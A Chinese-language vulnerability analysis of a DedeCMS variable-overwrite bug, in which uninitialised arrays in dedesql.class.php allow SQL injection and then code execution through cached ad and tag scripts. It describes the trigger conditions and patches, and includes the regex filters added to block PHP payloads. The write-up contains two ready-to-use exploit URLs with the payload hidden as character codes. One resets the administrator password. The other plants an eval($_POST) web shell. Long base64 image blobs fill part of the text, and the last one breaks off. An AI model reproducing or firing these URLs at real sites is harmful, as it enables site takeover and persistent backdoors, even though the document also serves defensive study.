目录

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

对于这个漏洞,我们可以简单概括如下

. "/plus/download.php"文件会引入"/include/common.inc.php"文件

. "/include/common.inc.php"中会对用户输入的变量进行"变量本地注册",如果注册的变量未被显式地初始化,则会导致本地变量覆盖

. "/include/common.inc.php"会引入"/include/dedesql.class.php"文件

. 存在漏洞的"/include/dedesql.class.php","没有"对$arrs1、$arrs2这两个数组进行初始化,导致黑客可以通过外部的输入覆盖这2个变量

. 黑客通过向"/plus/download.php"文件中POST入特殊构造的数据包,通过覆盖$arrs1、$arrs2这两个数组,最终污染"数据表前缀变量$cfg_",这个"数据表前缀变量$cfg_"会被带入数据库的SQL查询语句中,导致SQL注入

. "/plus/ad_js.php"、"/plus/mytag_js.php"会从数据库中查询出刚才被注入的PHP Code,将写过写入缓存文件中,并include执行,最终导致代码执行

Relevant Link:

http://bbs.safedog.cn/thread-52264-1-1.html

http://www.2cto.com/Article/201205/129974.html

http://www.91ri.org/6462.html

http://phpinfo.me/2013/12/24/111.html

2. 漏洞触发条件

. POC: 修改管员密码:

http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

//登录用户spider密码admin 

. POC: 向数据库插入后门

http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

//需要访问plus/mytag_js.php/aid=1,会在plus目录生成 x.php 密码 m

. "/include/dedesql.class.php","没有"对$arrs1、$arrs2这两个数组进行初始化

. "/plus/ad_js.php"、"/plus/mytag_js.php"未对从数据库查询出的数据进行有效过滤、检测

0x1: 手工验证

aaarticlea/png;base64,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" alt="" />

http://localhost/dedecms5.7/plus/ad_js.php?aid=21

3. 漏洞影响范围

. DedeCMS v5.

. <= DedeCMS v5.

4. 漏洞代码分析
5. 防御方法

0x1: /include/dedesql.class.php

/* */

$arrs1 = array();

$arrs2 = array();

//特殊操作

if(isset($GLOBALS['arrs1']))

{

    $v1 = $v2 = '';

    for($i=;isset($arrs1[$i]);$i++)

    {

        $v1 .= chr($arrs1[$i]);

    }

    for($i=;isset($arrs2[$i]);$i++)

    {

        $v2 .= chr($arrs2[$i]);

    }

    $GLOBALS[$v1] .= $v2;

}

/* */

0x2: /plus/ad_js.php

...

function find_ad_payload($adbody, $aid)

{

    global $db;

    $express = "/<\?[^><]+(\?>){0,1}|<\%[^><]+(\%>){0,1}|<\%=[^><]+(\%>){0,1}|<script[^>]+language[^>]*=[^>]*php[^>]*>[^><]*(<\/script\s*>){0,1}/iU";

    if (preg_match($express, $adbody))

    {

        $sql = " DELETE from `#@__myad` WHERE aid='$aid' ";

        $rs = $db->ExecuteNoneQuery($sql);

        if( file_exists(DEDEDATA . '/cache/myad-'.$aid.'.htm') )

        {

            @unlink(DEDEDATA.'/cache/myad-'.$aid.'.htm');

        }

        die("Request Error!");

    }

}

if(isset($arcID)) $aid = $arcID;

$arcID = $aid = (isset($aid) && is_numeric($aid)) ? $aid : ;

if($aid==) die(' Request Error! ');

$cacheFile = DEDEDATA.'/cache/myad-'.$aid.'.htm';

if( isset($nocache) || !file_exists($cacheFile) || time() - filemtime($cacheFile) > $cfg_puccache_time )

{

    $row = $dsql->GetOne("SELECT * FROM `#@__myad` WHERE aid='$aid' ");

    $adbody = '';

    if($row['timeset']==)

    {

        $adbody = $row['normbody'];

    }

    else

    {

        $ntime = time();

        if($ntime > $row['endtime'] || $ntime < $row['starttime']) {

            $adbody = $row['expbody'];

        } else {

            $adbody = $row['normbody'];

        }

    }

    find_ad_payload($adbody, $aid);

    ...

0x3: /plus/mytag_js.php

...

function find_tag_payload($tagbody, $aid)

{

    global $db;

    $express = "/<\?[^><]+(\?>){0,1}|<\%[^><]+(\%>){0,1}|<\%=[^><]+(\%>){0,1}|<script[^>]+language[^>]*=[^>]*php[^>]*>[^><]*(<\/script\s*>){0,1}/iU";

    if (preg_match($express, $tagbody))

    {

        $sql = " DELETE from `#@__mytag` WHERE aid='$aid' ";

        $rs = $db->ExecuteNoneQuery($sql);

        if( file_exists(DEDEDATA . '/cache/mytag-'.$aid.'.htm') )

        {

            @unlink(DEDEDATA.'/cache/mytag-'.$aid.'.htm');

        }

        die("Request Error!");

    }

}

if(isset($arcID)) $aid = $arcID;

$arcID = $aid = (isset($aid) && is_numeric($aid)) ? $aid : ;

if($aid==) die(" document.write('Request Error!'); ");

$cacheFile = DEDEDATA.'/cache/mytag-'.$aid.'.htm';

//die(var_dump($cacheFile));

if( isset($nocache) || !file_exists($cacheFile) || time() - filemtime($cacheFile) > $cfg_puccache_time )

{

    $pv = new PartView();

    $row = $pv->dsql->GetOne(" SELECT * FROM `#@__mytag` WHERE aid='$aid' ");

    if(!is_array($row))

    {

        $myvalues = "<!--\r\ndocument.write('Not found input!');\r\n-->";

    }

    else

    {

        $tagbody = '';

        if($row['timeset']==)

        {

            $tagbody = $row['normbody'];

        }

        else

        {

            $ntime = time();

            if($ntime>$row['endtime'] || $ntime < $row['starttime']) {

                $tagbody = $row['expbody'];

            }

            else {

                $tagbody = $row['normbody'];

            }

        }

        find_tag_payload($tagbody, $aid);

        $pv->SetTemplet($tagbody, 'string');

    ...

aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAeYAAABxCAIAAACP5ZfXAAAgAElEQVR4nO19eZQUx5lnSoM9M9599nveN+u37816fWgsMba0thhrJM/KktcCa+Uq0AmrA4TodsPKElgHVUISQjOWQbY8AqroprkPGfAIqEIylwSWxNVdXcXRTXeDkEGZlXUfWZlZR9PNUbF/xJGRWZlZ1d00UFL8yK6KjPi+L74vjl9GRVcHXKnUV4Lo6+vD6T4tk7yU+mBBXx8S7usrlfpKpb6+Ul8JpUt9fTr9vlIfvsEGkUXapAbNhFaOE32oMiwEHenD1SNnSgY/hhVaqSPQsWXr1g0bNm7YsGHjxg0bNmzYsHED9Q5vYAZOEDmqYANtQivHCWhrIxHauBEmNm7YuGEjqogY3KjXh1I617AjlB8bUdUbN6JqsG0WGguNhVZXoXGlUqmIfuALei2VijAf32oZULZYLBWNKvrbomZWs1Us0TUUNbEiMqnLKxZxTcUSrhC5BJWJwWKR8qCIHR9yaKW+vqPHjn3wwQeiKCYYGBgYrg5wxWKpiEASFvf6fKtSe93aBaCQhZi1dsn0ZtCh9fX17du3Lx6Pnzt3DjAwMDBcHeCKxUIBXoVioVgswJ9CsVgoFIrFYqFYICgW0U0RJ5FUoaiZoHULmrUiyqYEcWkRlhexoSKug7wV6fqL2KZWNdGjVEgkQwut1Nd34MABSZKudAcxMDAwaODyhUK+kC8UCoV8Ab3nMZHlyUtBy8rn81gkT/JQQveuVzQgrxPQy+MEqihvUoGpRaKnvQ85tFKpdPDgwVwud6U7iIGBgUEDl89DojKggF4R6aE0KijktXSe3GtZkPcoQWJMZ5yqtWAwSCvScsSIVqr3g8hg7tWW0jqNQtE+tD5G2QwMDFcfIGWrqqqqeVXNq6qaz+fzMJ3Paz8ogVasUAXlq0RczUM7iBtVZBtLwCwkiivAFvJqoVBQ8/l8oaDmiTUkQYySSvAtSeMasJuhw4d/85vfTJky5b777psyZcr8+fMPHz5SgMYL+TfeeCNfKNChqcS7vKqq+VKpePDQIVmWDe11/vz5t8ygqmrVtm5fwHGTNiVGpiNp4+0LOI5b0D4yFQ0GmQPeefO8BzKXT7G+cXLTlY26arNfyn45uWnevHmbTl4KUzXA3vN6Gm+cqqqKagtUrMiy/OKLL95yyy0ejyefz6sKLFN0Utb6ltkKYt22trYtW7YEAoG8mjeU1mAOIZ/Px+Px55577rbbbhs7duz48ePvvffe8ePH33XXXbfeeuucOXMymczChQvHjBmDQzCvo1gsHjp0sJKyi8Xi+vVv0Tl9fX0tLS3r11dn7XqmbDvfredePVP2yU3z9DCJsEJm3rx5pn7XSE+XkLKHRIh1RNmZA167njGXv6SUTXtg6kLmgHckhjCnqIqiKOiVTsA7VYVZOTn3/PPP33XXXRMmTBg/fnyeFCiKqmJJVSXGVEVRUYlmDP9TVUOJoiiKsnPXrkB7+65du9rb2zUBShBmqiquUtHJwJdUKjVp0qSxY8c+8sgjkydPbmpqeubZZ5qamiZPnvzII4+MGzduwoQJY8eOveeee/L5PKUJrarE+WKxeOjQIUVRDO2lKMq6desBAOfOnYdXqVRqaWkBAKxbt96eteuYshObJln6bsMz9U7Zg/XAyu1abV06yh6apcva7MOgbJoMIXMOc7U+6MB1dFzhAnmUjwhly4qsKIosa8woy4osK